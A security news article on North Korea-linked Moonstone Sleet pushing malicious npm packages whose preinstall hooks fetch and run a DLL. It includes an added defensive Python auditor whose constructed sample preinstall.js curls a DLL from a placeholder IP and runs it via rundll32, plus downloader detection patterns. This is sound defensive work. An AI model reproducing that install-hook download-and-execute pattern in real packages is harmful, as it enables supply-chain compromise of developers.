North Korean hackers using npm for initial access

A North Korea-linked threat actor known as Moonstone Sleet has been detected pushing malicious npm packages to the JavaScript package registry.

Moonstone Sleet first garnered attention in May 2024, when Microsoft released a report detailing the group's dual focus on espionage and financially motivated attacks. Using a diverse array of techniques, Moonstone Sleet targeted aerospace, education, and software organizations, as well as individual developers. Notable tactics included posing as candidates for remote tech jobs and spreading malicious npm packages via LinkedIn and freelancing websites.

Datadog Security Labs, the security research arm of cloud monitoring company Datadog, recently uncovered two malicious npm packages, "harthat-api" and "harthat-hash," published on July 7, 2024. The packages were removed shortly after publication and attracted no downloads. The researchers noted that the activity cluster aligns with what Microsoft tracks as Moonstone Sleet.

While the names of the malicious packages resemble Hardhat, a well-known Ethereum development utility on npm, their contents did not suggest a typosquatting attempt. Instead, the malicious code reused elements of the popular GitHub repository "node-config," which is published on npm as "config."

Moonstone Sleet's attack chains typically begin with bogus ZIP archives distributed through LinkedIn under fake company names, or via freelancing websites. The archives attempt to trick targets into running the payload by invoking an npm package as part of a purported technical skills assessment.

The discovered packages are designed to run a preinstall script declared in the package.json file, a lifecycle hook that npm executes automatically during installation, before any of the package's code is ever imported. The script checks whether it is running on Windows (the value "Windows_NT", which is what Node's os.type() returns there), then contacts an external server ("142.111.77[.]196") to download a DLL file, which is then loaded and executed via the rundll32.exe binary.
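The practical check this suggests is to inspect a package's install-time hooks before installing it. The Python below is an added example, not Datadog's or npm's code: it audits the lifecycle scripts in a package.json, follows any `node some-file.js` command into the shipped script, and flags the indicators described above (an OS check, a downloader, a URL pointing at a raw IP, rundll32 and a DLL artifact). The indicator patterns, the sample package contents and the 203.0.113.10 placeholder address are this example's own constructions, not the actual harthat-* code or its infrastructure.

```python
"""Audit npm package.json lifecycle hooks for install-time code execution.

Added example, not Datadog's or npm's code. All sample inputs are constructed.
"""
import json
import re

# Hooks npm runs automatically during `npm install` / `npm ci`, i.e. before
# the consuming project ever requires the package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics modelled on the behaviour described in the article. These are
# this example's own choices, not a published detection signature.
INDICATORS = {
    "os_check": re.compile(r"Windows_NT|os\.type\(\)|process\.platform"),
    "downloader": re.compile(r"\b(curl|wget|certutil|Invoke-WebRequest|iwr)\b", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
    "rundll32": re.compile(r"\brundll32(?:\.exe)?\b", re.I),
    "dll_artifact": re.compile(r"\.dll\b", re.I),
}

# Matches "node preinstall.js" so the hook's target file can be inspected too;
# real hooks are usually a one-liner that just launches a shipped script.
NODE_SCRIPT = re.compile(r"\bnode\s+(?:\./)?([\w./-]+\.[cm]?js)\b")


def scan_text(text, hook, source):
    """Return one finding per indicator that fires in `text`."""
    return [
        {"hook": hook, "source": source, "indicator": name}
        for name, pattern in INDICATORS.items()
        if pattern.search(text)
    ]


def audit_package(files):
    """`files` maps relative path -> contents for one unpacked package.

    Every lifecycle hook command is scanned directly; when it runs a JS file
    that ships in the package, that file is scanned as well.
    """
    manifest = json.loads(files["package.json"])
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        findings += scan_text(command, hook, "package.json")
        for target in NODE_SCRIPT.findall(command):
            if target in files:
                findings += scan_text(files[target], hook, target)
    return findings


# Constructed sample mimicking the described chain: OS check, download from a
# raw IP (TEST-NET placeholder, not the article's indicator), DLL run through
# rundll32.exe. This is NOT the actual harthat-* code.
SUSPICIOUS_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-suspicious",
        "version": "1.0.0",
        "scripts": {"preinstall": "node preinstall.js"},
    }),
    "preinstall.js": r"""
const os = require("os");
const { execSync } = require("child_process");
if (os.type() === "Windows_NT") {
  const dll = process.env.TEMP + "\\update.dll";
  execSync(`curl -s -o ${dll} http://203.0.113.10/update.dll`);
  execSync(`rundll32.exe ${dll},EntryPoint`);
}
""",
}

# Constructed benign sample: a native addon that legitimately builds on install.
BENIGN_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-native",
        "version": "2.3.1",
        "scripts": {"install": "node-gyp rebuild", "test": "node test.js"},
    }),
}


if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS_PACKAGE), ("benign", BENIGN_PACKAGE)):
        print(label, audit_package(pkg))
```

To run this against a real package without installing it, fetch the tarball with `npm pack <name>`, unpack it, and feed the file contents to `audit_package`. Independently of any scanner, `npm config set ignore-scripts true` (or `npm install --ignore-scripts`) stops npm from running these hooks at all, which neutralises this exact delivery mechanism at the cost of breaking packages that genuinely need an install step, such as native addons.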

Interestingly, the rogue DLL does not perform any malicious actions, suggesting either a trial run of the payload delivery infrastructure or an inadvertent push to the registry before the malicious code had been embedded.

Earlier this week, South Korea’s intelligence and law enforcement agencies released a joint security advisory highlighting cyber activities of the two well-known North Korea-aligned threat actors, Kimsuky and Andariel, aimed at the country’s construction and machinery sectors.
